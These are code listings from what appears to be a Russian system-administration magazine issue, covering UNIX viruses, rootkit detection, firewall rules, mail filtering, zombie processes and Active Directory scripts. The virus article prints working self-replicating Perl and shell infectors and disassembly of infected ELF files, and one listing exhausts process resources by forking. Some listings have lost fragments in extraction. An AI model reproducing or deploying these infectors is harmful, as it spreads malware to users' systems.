Вирусы в UNIX, или Гибель «Титаника» II Крис Касперски Листинг 1. Пример вируса, обнаруживающего себя по стилю #!/usr/bin/perl #PerlDemo open(File,$0); @Virus=; @Virus=@Virus[0...6]; close(File); foreach $FileName (<*>) { if ((-r $FileName) && (-w $FileName) && (-f $FileName)) { open(File, "$FileName"); @Temp=; close(File); if ((@Temp[1] =~ "PerlDemo") or (@Temp[2] =~ "PerlDemo")) { if ((@Temp[0] =~ "perl") or (@Temp[1] =~ "perl")) { open(File, ">$FileName"); print File @Virus; print File @Temp; close (File); } } } } Листинг 2. Фрагмент вируса UNIX.Tail.a, дописывающего себя в конец файла (оригинальные строки файла-жертвы выделены синим) #!/bin/sh echo "Hello, World!" for F in * do if ["$(head -c9 $F 2>/dev/null)"="#!/bin/sh" -a "$(tail -1 $F 2>/dev/null)"!="#:-P"] then tail -8 $0 >> $F 2>/dev/null fi done] Листинг 3. Фрагмент вируса UNIX.Head.b, внедряющегося в начало файла (оригинальные строки файла-жертвы выделены синим) #!/bin/sh for F in * do if [ "$(head -c9 $F 2>/dev/null)" = "#!/bin/sh" ] then head -11 $0 > tmp cat $F >> tmp mv tmp $F fi done echo "Hello, World!" Листинг 4. Фрагмент Perl-вируса UNIX.Demo #!/usr/bin/perl #PerlDemo open(File,$0); @Virus=; @Virus=@Virus[0...27]; close(File); foreach $FileName (<*>) { if ((-r $FileName) && (-w $FileName) && (-f $FileName)) { open(File, "$FileName"); @Temp=; close(File); if ((@Temp[1] =~ "PerlDemo") or (@Temp[2] =~ "PerlDemo")) { if ((@Temp[0] =~ "perl") or (@Temp[1] =~ "perl")) { open(File, ">$FileName"); print File @Virus; print File @Temp; close (File); } } } } Листинг 6. Фрагмент файла, зараженного вирусом UNIX.NuxBe.quilt, «размазывающим» себя по кодовой секции .text:08000BD9 xor eax, eax .text:08000BDB xor ebx, ebx .text:08000BDD jmp short loc_8000C01 … .text:08000C01 loc_8000C01: ; CODE XREF: .text:0800BDD^j .text:08000C01 mov ebx, esp .text:08000C03 mov eax, 90h .text:08000C08 int 80h ; LINUX - sys_msync .text:08000C0A add esp, 18h .text:08000C0D jmp loc_8000D18 … .text:08000D18 loc_8000D18: ; CODE XREF: .text:08000C0D^j .text:08000D18 dec eax .text:08000D19 jns short loc_8000D53 .text:08000D1B jmp short loc_8000D2B … .text:08000D53 loc_8000D53: ; CODE XREF: .text:08000D19^j .text:08000D53 inc eax .text:08000D54 mov [ebp+8000466h], eax .text:08000D5A mov edx, eax .text:08000D5C jmp short loc_8000D6C Листинг 7. Фрагмент файла, зараженного вирусом UNIX.NuxBe.jullet, «0размазывающим» себя по секции данных .rodata:08054140 aFileNameTooLon db 'File name too long',0 .rodata:08054153 ; ---------------------------------------- .rodata:08054153 mov ebx, 1 .rodata:08054158 mov ecx, 8049A55h .rodata:08054158 jmp loc_80541A9 .rodata:08054160 ; --------------------------------------- .rodata:08054160 aTooManyLevelsO db 'Too many levels of symbolic links',0 .rodata:08054182 aConnectionRefu db 'Connection refused',0 .rodata:08054195 aOperationTimed db 'Operation timed out',0 .rodata:080541A9 ; --------------------------------------- .rodata:080541A9 loc_80541A9: .rodata:080541A9 mov edx, 2Dh .rodata:080541AE int 80h ; LINUX - .rodata:080541B0 mov ecx, 51000032h .rodata:080541B5 mov eax, 8 .rodata:080541BA jmp loc_80541E2 .rodata:080541BA ; --------------------------------------- .rodata:080541BF db 90h ; Р .rodata:080541C0 aTooManyReferen db 'Too many references: can',27h,'t splice',0 .rodata:080541E2 ; --------------------------------------- .rodata:080541E2 loc_80541E2: .rodata:080541E2 mov ecx, 1FDh .rodata:080541E7 int 80h ; LINUX - sys_creat .rodata:080541E9 push eax .rodata:080541EA mov eax, 0 .rodata:080541EF add [ebx+8049B43h], bh .rodata:080541F5 mov ecx, 8049A82h .rodata:080541FA jmp near ptr unk_8054288 .rodata:080541FA ; --------------------------------------- .rodata:080541FF db 90h ; Р .rodata:08054200 aCanTSendAfterS db 'Can',27h,'t send after socket shutdown',0 Листинг 10. Схема расположения кодовых секций типичного файла .init содержит инициализационный код .plt содержит таблицу связки подпрограмм .text содержит основной код программы .fini содержит термирующий код программы Листинг 11. Фрагмент утилиты ping, использующей, как и многие другие программы, относительные ссылки между секциями кодового сегмента .init:08000910 _init proc near ; CODE XREF: start+51vp .init:08000910 E8 6B 18 00 00 call sub_8002180 .init:08000915 C2 00 00 retn 0 .init:08000915 _init endp … .text:08002180 sub_8002180 proc near ; CODE XREF: _init^p Листинг 13. Фрагмент вируса Lotek, тщательно скрывающего свой интерес к ELF-файлам .text:08048473 mov eax, 0B9B3BA81h ; -"ELF" (минус "ELF") .text:08048478 add eax, [ebx] ; первые четыре байта жертвы .text:0804847A jnz short loc_804846E ;-> это не ELF Листинг 14. Фрагмент вируса Linux.ZipWorm, активно и небезуспешно противостоящего дизассемблеру IDA Pro .text:080483C0 push 13h .text:080483C2 push 2 .text:080483C4 sub ecx, ecx .text:080483C6 pop edx .text:080483C7 pop eax ; // EAX := 2. это вызов fork .text:080483C8 int 80h ; LINUX - ђ IDA не смогла определить имя вызова! Листинг 15. Пример нормальной стартовой функции с классическим прологом и эпилогом text:080480B8 start proc near text:080480B8 text:080480B8 push ebp text:080480B9 mov ebp, esp text:080480BB sub esp, 0Ch … text:0804813B ret text:0804813B start endp Листинг 16. Альтернативный пример нормальной стартовой функции .text:08048330 public start .text:08048330 start proc near .text:08048330 xor ebp, ebp .text:08048332 pop esi .text:08048333 mov ecx, esp .text:08048335 and esp, 0FFFFFFF8h .text:08048338 push eax .text:08048339 push esp .text:0804833A push edx .text:0804833B push offset sub_804859C .text:08048340 push offset sub_80482BC .text:08048345 push ecx .text:08048346 push esi .text:08048347 push offset loc_8048430 .text:0804834C call ___libc_start_main .text:08048351 hlt .text:08048352 nop .text:08048353 nop .text:08048353 start endp Листинг 17. Стартовый код вируса PolyEngine.Linux.LIME.poly .data:080499C1 LIME_END: ; Alternative name is 'main' .data:080499C1 mov eax, 4 .data:080499C6 mov ebx, 1 .data:080499CB mov ecx, offset gen_msg ; "Generates 50 [LiME] encrypted…" .data:080499D0 mov edx, 2Dh .data:080499D5 int 80h ; LINUX - sys_write .data:080499D7 mov ecx, 32h Что такое rootkits, и как с ними бороться Сергей Яремчук # nmap -v -P0 -sU -sT -p 1-65535 IP_ADDRESS # rpm -Va > file # rpm -Va S.5....T c /etc/hotplug/usb.usermap S.5....T c /etc/sysconfig/pcmcia # rpm -Uvh -force <имя_файла.rpm> # ./chkrootkit ROOTDIR is `/' Checking `amd'... not found Checking `basename'... not infected Checking `biff'... not found Checking `chfn'... not infected # ./chkrootkit -r /mnt/test # ./chkrootkit -p /mnt/safebin # ./chkrootkit -x | more #./ ifpromisc eth0 is not promisc # find / -name "*.*" # kstat –p 270 # kstat –s SysCall Address sys_exit 0xc0117ce4 sys_fork 0xc0108ebc sys_read 0xc012604c sys_kill 0xc28465d4 WARNING! Should be at 0xc01106b4 # gcc -o rkscan rkscan1.0.c *** Don't run this scanner as root ! *** $ ./rkscan -=- Rootkit Scanner -=- -=- by Stephane.Aubert@hsc.fr -=- Scanning for ADORE version 0.14, 0.24 and 2.0b ... ADORE rootkit NOT DETECTED on this system. Scanning for KNARK version 0.59 ... KNARK rootkit NOT DETECTED on this system. Done. Сам себе антихакер Защита от хакерских атак с помощью ipfw Сергей Супрунов # nmap [options] hosts tcpdump [ -adeflnNOpqStvx ] [ -c count ] [ -F file ] [ -i interface ] [ -r file ] [ -s snaplen ] [ -T type ] [ -w file ] [ expression ] # tcpdump host # tcpdump {src | dst} host # tcpdump [{src | dst}] port # tcpdump {tcp | udp | icmp} # tcpdumt net 192.168.0.0 mask 255.255.255.0 # tcpdumt net 192.168.0.0/24 # tcpdump ‘tcp[13] & 18 != 0’ # tcpdumt ‘tcp[13] & 63 = 63’ # tcpdump ‘tcp[13] & 63 = 0’ Номер Действие Протокол from Источник to Приемник [Опции] # ipfw add number allow tcp from any to me setup limit src-addr 5 # nmap –sF # ipfw add number reject tcp from any to any not established tcpflags fin # ipfw add number reject tcp from any to any tcpflags fin, syn, rst, psh, ack, urg # ipfw add number reject tcp from any to any tcpflags !fin, !syn, !rst, !psh, !ack, !urg # ipfw add 10007 deny ip from any to any not verrevpath in # ipfw add 10007 deny log ip from any to any not verrevpath in option “IPFIREWALL_VERBOSE_LIMIT=100” # ipfw add number reject log logamount 5 tcp from any to any not established tcpflags fin $fwcmd add ПРАВИЛО $fwcmd add 100 pass all from any to any via lo0 $fwcmd add 200 deny all from any to 127.0.0.0/8 firewall_type=”/etc/ipfw.conf” # Запрет X-сканирования: add 1001 reject log tcp from any to any tcpflags fin, syn, rst, psh, ack, urg # Запрет N-сканирования: add 1002 reject log tcp from any to any tcpflags !fin, !syn, !rst, !psh, !ack, !urg # Запрет FIN-сканирования: add 1003 reject log tcp from any to any not established tcpflags fin # Защита от спуфинга add 1004 deny log ip from any to any not verrevpath in # Ограничение числа одновременных соединений: add 1005 allow ip from any to any setup limit src-addr 10 Rule Set Based Access Control для Linux Сергей Яремчук # tar xvjf linux-2.4.22.tar.bz2 # cd linux # tar xvjf ../rsbac-v1.2.2.tar.bz2 # gzip -dc ../patch-2.4.22-v1.2.2.gz | patch -p1 # wget -c http://www.rsbac.org/bugfixes/rsbac-bugfix-v1.2.1-1.diff # patch -p1 < rsbac-bugfix-v1.2.1-1.diff # make menuconfig # touch Makefile #make dep bzImage modules modules_install # tar xvzf rsbac-admin-v1.2.2.tar.gz. # cd rsbac-admin-v1.2.2 # ./configure (если используется ядро, находящееся в каталоге, отличном от /usr/src/linux, его местонахождение указываем при помощи –with-kerneldir) # make && make install bash-2.05b# su secoff setuid: Operation not permitted Oct 31 22:58:13 stas kernel: rsbac_adf_request(): request CHANGE_OWNER, caller_pid 89, caller_prog_name sendmail, caller_uid 0, target-type PROCESS, tid 89, attr owner, value 15, result NOT_GRANTED by AUTH Безумный чертенок Александр Байрак 00100 allow ip from any to any via lo0 00200 deny ip from any to 127.0.0.0/8 00300 deny ip from 127.0.0.0/8 to any 65000 allow ip from any to any Эффективная работа с портами в FreeBSD Владимир Осинцев # cd /usr/ports # make search name=opera Port: opera-7.21.20031013 Path: /usr/ports/www/opera Info: A blazingly fast, full-featured, standards-compliant browser Maint: avleeuwen@piwebs.com Index: www B-deps: ... R-deps: ... ... # make search key=dvd Port: dvdrip-0.48.8 Path: /usr/ports/multimedia/dvdrip Info: This is dvd::rip, a Perl Gtk+ based dvd-ripper Maint: michaelnottebrock@gmx.net Index: multimedia B-deps: ... R-deps: ... ... # сd /usr/ports/Tools/scripts # ./portsearch -n "^xmms" -p "(audio|multimedia)" -i "plugin" # ./portsearch -n "^xmms" -f ftp://ftp.freebsd.org/pub/FreeBSD/branches/-current/ports/INDEX # cd /usr/ports && make index # cd /usr/ports/www/opera # make pretty-print-build-depends-list This port requires package(s) "XFree86-libraries-4.3.0_5 compat4x-i386-5.0.20030328 expat-1.95.6_1 fontconfig-2.2.0 freetype2-2.1.4_1 imake-4.3.0 perl-5.6.1_13 pkgconfig-0.15.0 png-1.2.5_2" to build. # pkg_info -R ORBit2-2.6.2 Information for ORBit2-2.6.2: Required by: libgnome-2.2.0.1 nautilus2-2.2.4 gnome2-2.2.1_1 ... # pkg_info -xc sudo Information for sudo-1.6.7.4: Comment: Allow others to run commands as root # pkg_info -xL opera Information for opera-7.21.20031013: Files: /usr/X11R6/bin/opera /usr/X11R6/share/doc/opera/LICENSE /usr/X11R6/share/doc/opera/help /usr/X11R6/share/opera/bin/m2.so ... # сd /usr/ports # make readmes # pkg_version | less gnome2 = nvidia-driver < opera = vim < ... # pkg_version -l "<" nvidia-driver < vim < ... # pkg_version -v ftp://ftp.freebsd.org/pub/FreeBSD/branches/-current/ports/INDEX | less # cd /usr/ports/Tools/scripts # ./consistency-check # cd /usr/ports/sysutils/portupgrade # make install clean # portsclean -C Cleaning out /usr/ports/*/*/work... Delete /usr/ports/news/gnus-emacs20/work ... # portsclean -DD Detecting unreferenced distfiles... Delete /usr/ports/distfiles/KDE/qt-x11-free-3.1.2.tar.bz2 ... # cd /usr/ports/Tools/scripts # ./distclean # ENV['PKG_TMPDIR'] ||= '/var/tmp' ENV['PKG_TMPDIR'] ||= '/usr/tmp' # portsdb -Ufu # cd /usr/ports/multimedia/mplayer # make WITH_GUI=yes WITH_LANG=ru install clean MAKE_ARGS = { 'multimedia/mplayer-*' => 'WITH_GUI=yes WITH_LANG=ru', 'multimedia/xmms-*' => 'WITHOUT_MIKMOD=yes', } Почтовый сервер с защитой от спама и вирусов на основе FreeBSD Геннадий Дмитриев cd /home/user mkdir cvsup cd cvsup cd /home/user mkdir cvsup cd cvsup vi cvsup.ports # =====начало файла cvsup.ports========= *default host=cvsup.FreeBSD.org *default base=/usr *default prefix=/usr *default release=cvs *default tag=. *default delete use-rel-suffix compress ports-mail ports-net ports-security ports-sysutils ports-www # =====конец файла cvsup.ports========== vi cvsup.sh # =======начало файла cvsup.sh========== #!/bin/sh /usr/local/bin/cvsup -g -L 2 cvsup.ports # =======конец файла cvsup.sh=========== chmod +x cvsup.sh /usr/ports/mail/sendmail /usr/ports/mail/p5-Mail-SpamAssassin /usr/ports/mail/spamass-milter /usr/ports/mail/kavmilter /usr/ports/mail/sendmail/work/sendmail-8.12.10/cf/cf make mailer.conf /usr/local/etc/mail/spamassassin/local.cf # ==========начало файла local.cf======== # don't use agent use_razor2 0 use_dcc 0 use_pyzor 0 # check rdl skip_rbl_checks 0 # autowhitelist use_auto_whitelist 1 auto_whitelist_path /var/spool/filter/.spamassassin/auto_whitelist # bayes use_bayes 1 bayes_path /var/spool/filter/.spamassassin/bayes bayes_expiry_max_db_size 1500000 auto_learn 1 ok_languages en ru de ok_locales en ru de # rewrite subject rewrite_subject 1 subject_tag *SPAM*_HITS_ points* : required_hits 3.5 # user rules allow_user_rules 0 # report options always_add_report 1 report_safe 0 report_charset koi8-r # score options score FROM_ILLEGAL_CHARS 1.5 score HEAD_ILLEGAL_CHARS 1.5 score SUBJ_ILLEGAL_CHARS 1.5 score SUBJ_HAS_SPACES 2.5 score NO_REAL_NAME 1.0 score PENIS_ENLARGE 3.5 score PENIS_ENLARGE2 3.5 score FROM_HAS_MIXED_NUMS 1.0 score FORGED_IMS_TAGS 0.5 # network whitelist whitelist_from localhost whitelist_to spam@mycompany.ru # ==========конец файла local.cf========= # =========начало файла spammerdaemon.sh== #!/bin/sh case "$1" in start) kill `ps ax | grep spamd | grep -v grep | awk '{print $1}' | head -1` >/dev/null 2>/dev/null && echo -n ' spamd' [ -x /usr/local/bin/spamd ] && /usr/local/bin/spamd -d -a -u filter -x -s local5 && echo -n ' spamd' ;; stop) kill `ps ax | grep spamd | grep -v grep | awk '{print $1}' | head -1` >/dev/null 2>/dev/null && echo -n ' spamd' ;; *) echo "Usage: `basename $0` {start|stop}" >&2 ;; esac exit 0 # =========конец файла spammerdaemon.sh=== vipw filter:*:1025:1025::0:0:Mail Filter:/var/spool/filter:/sbin/nologin vi /etc/group filter:*:1025:filter mkdir /var/spool/filter chown filter:filter /var/spool/filter cd /var/log cat >./spamd.log chown filter:filter spamd.log # ========добавка в файл syslog.conf====== local5.* /var/log/spamd.log # =========конец файла syslog.conf======== # ======добавка в файл newsyslog.conf===== /var/log/spamd.log filter:filter 640 3 2000 * Z # =======конец файла newsyslog.conf======= INPUT_MAIL_FILTER(`spamassassin', `S=local:/var/run/spamass-milter.sock, F=, T=C:15m;S:4m;R:4m;E:10m') /usr/local/etc/rc.d/spamass-milter.sh # =======начало файла spamass-milter.sh=== #!/bin/sh DAEMON=/usr/local/sbin/spamass-milter SOCKET=/var/run/spamass-milter.sock PIDFILE=/var/run/spamass-milter.pid SPAMADRESS=spam@mycompany.ru case "$1" in start) if [ -f "${DAEMON}" -a -x "${DAEMON}" ] then "${DAEMON}" -b "${SPAMADRESS}" -p "${SOCKET}" -f & echo $! > "${PIDFILE}" sleep 1 kill -HUP `head -1 /var/run/sendmail.pid` echo -n ' spamass-milter running' fi ;; stop) if [ -f "${PIDFILE}" ] then read -r pid junk < "${PIDFILE}" kill ${pid} rm -f "${SOCKET}" "${PIDFILE}" sleep 1 kill -HUP `head -1 /var/run/sendmail.pid` echo -n ' spamass-milter stopped' fi ;; esac # ========конец файла spamass-milter.sh=== # =======начало файла AvpUnix.ini========= [AVP32] DefaultProfile=/usr/local/share/AVP/defUnix.prf [Configuration] KeysPath=/usr/local/share/AVP SetFile=avp.set BasePath=/usr/local/share/AVP/Bases SearchInSubDir=No UpdatePath=http://downloads2.kaspersky-labs.com/updates/ # ========конец файла AvpUnix.ini========= # =======начало файла defUnix.ini========= # same section with parameters for objects [Object] Names=*/home;*/tmp;*/var/tmp;/usr/src;/mnt/cdrom;/usr/tmp;/tmp/kav Memory=No Sectors=No ScanAllSectors=No Files=Yes FileMask=2 UserMask=*.tar.gz ExcludeFiles=0 ExcludeMask=*.txt *.cmd ExcludeDir= Packed=Yes Archives=Yes SelfExtArchives=Yes MailBases=Yes MailPlain=Yes Embedded=Yes InfectedAction=3 BackupInfected=No IfDisinfImpossible=1 Warnings=Yes CodeAnalyser=Yes RedundantScan=No SubDirectories=Yes CrossFs=Yes # global(common) options sections [Options] ScanRemovable=Yes ScanSubDirAtEnd=No ParallelScan=No LimitForProcess=16 EndlesslyScan=No ScanDelay=-1 Symlinks=1 [Report] Report=Yes UseSysLog=No ReportFileName=/var/log/kav/kavscan.rpt Append=Yes ReportFileLimit=Yes ReportFileSize=500 RepCreateFlag=600 ExtReport=No WriteTime=Yes WriteExtInfo=No UseCR=No RepForEachDisk=No LongStrings=Yes UserReport=No UserReportName=/var/log/kav/userreport.log # Showing objects ShowOK=No ShowPack=No ShowPassworded=No ShowSuspision=No ShowWarning=No ShowCorrupted=No ShowUnknown=No # Action with infected files [ActionWithInfected] InfectedCopy=No # Action with suspicion files [ActionWithSuspicion] SuspiciousCopy=No # Action with corrupted files [ActionWithCorrupted] CorruptedCopy=No [TempFiles] UseMemoryFiles=Yes LimitForMemFiles=6000 MemFilesMaxSize=20000 TempPath=/tmp [Priority] Father=0 Child=0 [Customize] Sound=No UpdateCheck=No UpdateInterval=90 OtherMessages=No RedundantMessage=No DeleteAllMessage=No ExitOnBadBases=Yes UseExtendedExitCode=Yes # ========конец файла defUnix.ini========= mkdir /var/log/kav mkdir /tmp/kav /usr/local/etc/kavmilter.conf # =======начало файла kavmilter.conf======== SendmailPipe = /var/run/kavmilter KAVPipe = /var/run/AvpCtl PIDFile = /var/run/kavmilter.pid TempDirectory = /tmp/kav KAVTimeout = 60 SendmailTimeout = 300 DebugLevel = 0 DaemonMode = yes InfectedAction = discard # ========конец файла kavmilter.conf======== # =======начало файла kavmilter.sh========== #!/bin/sh PREFIX=/usr/local/libexec PIPE=/var/run/kavmilter KAVPIPE=/var/run/AvpCtl PIDFILE=/var/run/kavmilter.pid TEMPDIR=/tmp/kav DPARMS="-D 0" case "$1" in start) rm -f ${PIPE} > /dev/null && ${PREFIX}/kavmilter ${DPARMS} > /dev/null && echo -n ' kavmilter' ;; stop) killall -TERM kavmilter > /dev/null && rm -f ${PIPE} && rm -f ${PIDFILE} && echo "kavmilter stopped" ;; restart) killall -TERM kavmilter > /dev/null && rm -f ${PIPE} && rm -f ${PIDFILE} && sleep 5 && ${PREFIX}/kavmilter ${DPARMS} > /dev/null && echo "kavmilter restarted" ;; *) echo "Usage: `basename $0` {start|stop|restart}" >&2 ;; esac exit 0 # ========конец файла kavmilter.sh========== # =======начало файла kavdaemon.sh========== #!/bin/sh PREFIX="/usr/local/share/AVP" BINDIR="/usr/local/share/AVP" AVPDIR="/tmp/kav" AVPPIPE="/var/run" DPARMS="-Y -f=$AVPPIPE -MP -dl -MD -I0 -o{$AVPDIR} $AVPDIR" case "$1" in start) $BINDIR/kavdaemon $DPARMS && echo -n ' kavdaemon' ;; stop) [ -f $AVPDIR/AvpPid ] && $BINDIR/kavdaemon ї -ka > /dev/null && echo "kavdaemon terminated" ;; restart) [ -f $AVPDIR/AvpPid ] && $BINDIR/kavdaemon -ka > /dev/null && $BINDIR/kavdaemon $DPARMS > dev/null && echo 'kavdaemon restarted' ;; *) echo "Usage: `basename $0` {start|stop|restart}" >&2 ;; esac exit 0 # ========конец файла kavdaemon.sh========== # =======начало файла main.mc=============== divert(-1) divert(0) include(`../m4/cf.m4') VERSIONID(`$FreeBSD: src/etc/sendmail/freebsd.mc, v 1.10.2.11 2001/07/14 18:07:27 gshapiro Exp $') OSTYPE(freebsd5) DOMAIN(generic) FEATURE(`no_default_msa') DAEMON_OPTIONS(`Port=smtp, Name=MTA') FEATURE(access_db, `hash -o -T /etc/mail/access') FEATURE(blacklist_recipients) FEATURE(local_lmtp) FEATURE(mailertable, `hash -o /etc/mail/mailertable') FEATURE(relay_based_on_MX) FEATURE(virtusertable, `hash -o /etc/mail/virtusertable') dnl Realtime Blocking List - AntiSpam Control dnl FEATURE(dnsbl) dnl FEATURE(dnsbl, `relays.osirusoft.com', `Mail rejected - see http://relays.osirusoft.com/') FEATURE(dnsbl,`relays.ordb.org',`Mail rejected - see http://ordb.org/') FEATURE(dnsbl,`blackholes.easynet.nl',`Mail rejected - see http://blackholes.easynet.nl/') dnl FEATURE(dnsbl,`inputs.orbz.org', `Mail rejected - see http://orbz.org/') dnl FEATURE(dnsbl,`relays.visi.com', `Mail rejected - see http://relays.visi.com/') dnl FEATURE(dnsbl, `ex.dnsbl.org', `Mail rejected - see http://www.dnsbl.org/') dnl FEATURE(dnsbl,`blackholes.mail-abuse.org', `Mail rejected - see http://mail-abuse.org/') dnl FEATURE(dnsbl,`relays.mail-abuse.org',`Mail rejected - see http://work-rss.mail-abuse.org/') dnl FEATURE(dnsbl,`dialups.mail-abuse.org', `Mail rejected; see http://mail-abuse.org/dul/enduser.htm') dnl Russian DialUp Blocking List FEATURE(`dnsbl',`dul.ru',`Mail rejected - your are spammer') dnl Uncomment the first line to change the location of the default dnl /etc/mail/local-host-names and comment out the second line. dnl define(`confCW_FILE', `-o /etc/mail/sendmail.cw') define(`confCW_FILE', `-o /etc/mail/local-host-names') define(`confMAX_MIME_HEADER_LENGTH', `256/128') define(`confMAX_MESSAGE_SIZE', 5000000) define(`confNO_RCPT_ACTION', `add-to-undisclosed') define(`confPRIVACY_FLAGS', `authwarnings,noexpn,novrfy,noetrn,nobodyreturn,goaway, restrictmailq,restrictqrun') define(`confSMTP_LOGIN_MSG',`Antispam-MTA; "Non-authorized relaying DENIED." $b') define(`confMAX_RCPTS_PER_MESSAGE', `5') INPUT_MAIL_FILTER(`spamassassin', `S=local:/var/run/spamass-milter.sock, F=, T=C:15m;S:4m;R:4m;E:10m') INPUT_MAIL_FILTER(`kavmilter',`S=unix:/var/run/kavmilter,F=T') define(`confMILTER_LOG_LEVEL',`6') MAILER(local) MAILER(smtp) # ========конец файла main.mc=============== INPUT_MAIL_FILTER(`spamassassin', `S=local:/var/run/spamass-milter.sock, F=, T=C:15m;S:4m;R:4m;E:10m') INPUT_MAIL_FILTER(`kavmilter',`S=unix:/var/run/kavmilter,F=T') define(`confMILTER_LOG_LEVEL',`6') m4 main.mc>sendmail.cf =====начало файла===== Return-Path: narayan@epfl.ch Received: from flashmail.com ([200.75.94.146]) by ns.mycompany.ru (8.12.10/8.12.10) with SMTP id hB38USe7096329 for ; Wed, 3 Dec 2003 11:30:44 +0300 (MSK) (envelope-from narayan@epfl.ch) Date: Wed, 03 Dec 2003 06:35:56 +0000 From: narayan@epfl.ch Subject: =?Windows-1251?B?yvLuIOHz5OXyIOz98O7sPyE=?= To: Lan lan@mycompany.ru ………… ======конец файла===== cd /home/user mkdir spamd spamd/ham spamd/spam cd spamd vi spamd-training.sh ====начало файла spamd-training.sh==== #!/bin/sh sa-learn --ham /home/gennadiy/Spamd/ham/ sa-learn --spam /home/gennadiy/Spamd/spam/ =====конец файла spamd-training.sh==== chmod +x spamd-training.sh ./spamd-training.sh sa-learn --dump magic # =======начало файла start.sh=============== #!/bin/sh # my start script # kavdaemon - antiviral tolkien pro /usr/local/etc/script/kavdaemon.sh start # starting mail filter daemon /usr/local/etc/script/spammerdaemon.sh start /usr/local/etc/script/kavmilter.sh start /usr/local/etc/script/spamass-milter.sh start # ========конец файла start.sh=============== «Убиваем» зомби Андрей Уваров #include #include #include int main(){ // с этого места начинает своё выполнение потомок pid_t chld_PID= fork(); //если chld_PID == 0, то текущий процесс – потомок if(chld_PID!= 0){ printf("I'm a parent\n"); }else{ printf("I'm a child\n"); return 0; } #include #include #include int main(){ pid_t chld_PID= fork(); if(chld_PID!= 0){ printf("I'm a parent\n"); //остановим выполнение родителя до ввода символа getchar(); }else{ printf("I'm a child\n"); } return 0; } ps ax [dashin@dashin zombies]$ ps ax PID TTY STAT TIME COMMAND 1 ? S 0:05 init .............................................. 18730 pts/4 S 0:00 bash -rcfile .bashrc 18767 pts/4 S 0:00 ./one_zomb 18768 pts/4 Z 0:00 [one_zomb ] 18864 pts/5 R 0:00 ps ax [dashin@dashin zombies]$ #include #include #include int main(){ pid_t our_child; while(our_child != -1){ our_child= fork(); if(our_child == 0){ return 0; } } getchar(); return 0; } [dashin@dashin zombies]$ ps ax bash: fork: Resource temporarily unavailable [dashin@dashin zombies]$ #include #include #include int main(){ pid_t our_child; our_child= fork(); if(our_child == 0){ return 0; } sleep(10); wait(); getchar(); return 0; } top -d 1 #include #include #include #include void killchld(){ wait(); } int main(){ pid_t our_child; int i; signal(SIGCHLD, killchld); for(i=1;i< 0xFF;i++){ our_child= fork(); if(our_child == 0){ return 0; } } getchar(); return 0; } #include #include #include #include int main(){ pid_t our_child; signal(SIGCHLD, SIG_IGN); //так делать не стоит int i; for(i=1;i< 0xFF;i++){ our_child= fork(); if(our_child == 0){ return 0; } } getchar(); return 0; } Active Directory - теория построения Иван Коробко Пример 1а Пример 1б i= Lbound(Array) For Each i in Array For i To Ubound(Array) element=Array(i) element=Array(i) next ……………………… Next Пример 2 Dim Array(100) …………………… For j=0 to Ubound(Array) For i=0 to Ubound(Array) If StrComp(Array_sort(i),Array_sort(i+1),0)=1 Then temp=Array(i) Array (i)=Array(i+1) Array(i+1)=temp End if Next Next Пример 3 Dim Array(100) ……………….. Dim SearchString="string" For i=0 to Ubound(Array) if Instr(Lcase(Array(i)),LCase(SearchString)) then MsgBox "Строка найдена" else MsgBox "Строка не найдена" End if Next Пример 4 temp="" Set gc = GetObject("GC:") For each child in gc temp=temp+child.name Next msgbox temp Пример 5: Set obj=GetObject("Protocol://ClassName") For each SubClass in ClassName temp=SubClass.Property Next Пример 5 Set obj=GetObject("ADs:") For Each provider IN obj temp = temp + provider.name + chr(13) Next MsgBox temp LDAP://HostName[:PortNumber][/DistinguishedName] WinNT:[//DomainName[/ComputerName[/ObjectName[,className]]]]